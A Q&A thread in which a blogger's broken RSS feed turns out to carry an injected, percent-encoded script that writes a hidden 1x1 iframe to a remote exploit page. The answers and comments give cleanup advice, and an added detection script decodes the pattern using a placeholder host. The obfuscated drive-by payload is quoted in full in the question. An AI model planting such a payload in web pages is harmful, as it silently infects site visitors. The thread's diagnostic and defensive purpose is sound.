tags:

views:

57

answers:

1

My feed is broken: Feed Validator says this portion is the problem. Any thoughts?

```xml
]]></content:encoded>
<wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/</wfw:commentRss>
<slash:comments>2</slash:comments>
</item>
</channel>
</rss>
<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
```
+4  A: 
<script language="javascript">eval(unescape("%64%6F%63...

You've been hacked. An attacker has compromised your site and added this script to the bottom of some of your pages (probably all of them, judging by your main site). It loads a bunch of exploit code against web-browsers and plugins that attempts to infect other people's computers. That it also results in the RSS being invalid is a side-effect.

You need to get the site off-line before it infects more people, then work on the clean-up, which will depend on how they compromised it/what kind of server it is. Certainly at the very least you will need to delete your current site code and upload fresh new scripts, from a machine you know is clean(*), with all your passwords changed. If it's your own [virtual] server you will need to check that the server itself hasn't been rooted.

(*: a very common way sites are getting compromised at the moment is through hacked client machines running FTP. The trojans steal the FTP passwords when you connect. So you need to check and disinfect every machine you might have used to connect to the site. And if you find anything suspicious on one of them, don't trust AV tools to completely clean it, because today they just can't keep up with the quantity of malcode out there. Re-install the operating system instead.)

bobince
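A defender-side triage script, added here as an example (not code from the answer above): it scans a re-downloaded copy of the site for the `eval(unescape("%..."))` pattern the answer describes, decodes it the way the browser would, and flags the hidden-iframe markers. The sample feed tail and its payload are constructed, with a placeholder domain, and the file extensions scanned are an assumption.

```python
"""Find injected eval(unescape("%..")) script blocks in feed, HTML and PHP output."""
import os
import re
from urllib.parse import unquote

# The injected block: a <script> whose only content is eval(unescape("<percent-encoded js>")).
INJECT_RE = re.compile(
    r'<script[^>]*>\s*eval\s*\(\s*unescape\s*\(\s*"((?:%[0-9a-fA-F]{2})+)"\s*\)\s*\)\s*;?\s*</script>',
    re.IGNORECASE,
)
# Decoded-content markers typical of a hidden drive-by iframe.
MARKERS = ("document.write", "<iframe", "width=1", "height=1", "frameborder=0")


def find_injections(text):
    """Return [(line_no, decoded_js, matched_markers)] for each injected block in text."""
    findings = []
    for m in INJECT_RE.finditer(text):
        decoded = unquote(m.group(1))  # same %xx transform as JavaScript unescape()
        line_no = text.count("\n", 0, m.start()) + 1
        hits = [k for k in MARKERS if k in decoded.lower()]
        findings.append((line_no, decoded, hits))
    return findings


def scan_tree(root, exts=(".php", ".html", ".xml", ".js")):  # extensions are an assumption
    """Walk a downloaded copy of the site; map each affected file path to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = find_injections(fh.read())
                if found:
                    report[path] = found
    return report


def _encode_all(js):
    """Percent-encode every character, the way the injected payload is obfuscated."""
    return "".join("%%%02X" % ord(c) for c in js)


# Constructed sample: a feed tail with an injected script pointing at a placeholder host.
SAMPLE_JS = ('document.write(\'<iframe src="http://malware.example.invalid/in.php"'
             ' width=1 height=1 frameborder=0></iframe>\');')
SAMPLE_FEED = ("</item>\n</channel>\n</rss>\n"
               '<script language="javascript">eval(unescape("'
               + _encode_all(SAMPLE_JS) + '"))</script>\n')

if __name__ == "__main__":
    for line_no, js, hits in find_injections(SAMPLE_FEED):
        print("line %d hits %s\n  decoded: %s" % (line_no, ", ".join(hits), js))
```

Run `scan_tree("/path/to/downloaded/site")` against the copy you pull back from the server to list every file carrying the block; a clean WordPress install should return an empty report.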
That doesn't sound good. I use wordpress and godaddy. I stopped using FTP months ago after my trial expired. I have NO idea what to do about this. I would LOVE to hire you to help me. Interested?
Daniel
Some pointers on what to do: http://googlewebmastercentral.blogspot.com/2008/04/my-sites-been-hacked-now-what.html
Pekka
@Daniel: Well let's try to solve it here first! How have you been connecting to update the site since stopping with FTP? (eg. SFTP? With the same password as FTP used? Is your password strong, or a simple word-like password?) Try running multiple virus checkers over your client machine and any others used to update the site. Judging by the position it has inserted the `<script>`, it looks like it's a server account compromise that has altered the `.php` files, and not simply a database injection. But re-download the PHP from the hacked server to check that they have been inserted there.
bobince
(if not, there must be a more complicated Apache-level compromise, but I can't see anyone else's sites on that Godaddy server with the exploit code, so I don't think the server itself is compromised at the moment.)
bobince
to update the site I just throw in posts through wp-admin. I haven't made any real changes since 4 months ago. I will run the virus checkers. The password was very strong. Either it was random characters they gave me or my usual password, which is a nice combination of everything and impossible to guess. The server... goes through godaddy, right? How do I download the PHP? I'm not clear about the server stuff. I think you mean by going through FTP, but I have to download cuteFTP or something similar first, correct? Please check back, I won't give up and want to try first. thanks!
Daniel
Oh, so you don't administer it at all? Who's responsible for keeping Wordpress and any other software up to date on the server? (I see you are running the latest WP 2.9.1, so someone must be!) You can access FTP using plain old Windows Explorer, just type `ftp://[email protected]` into the address bar. You can also try WinSCP, which does plain FTP as well as SFTP; in this century really nobody should be using unencrypted FTP, but still there are some hosting outfits that don't support it, sadly.
bobince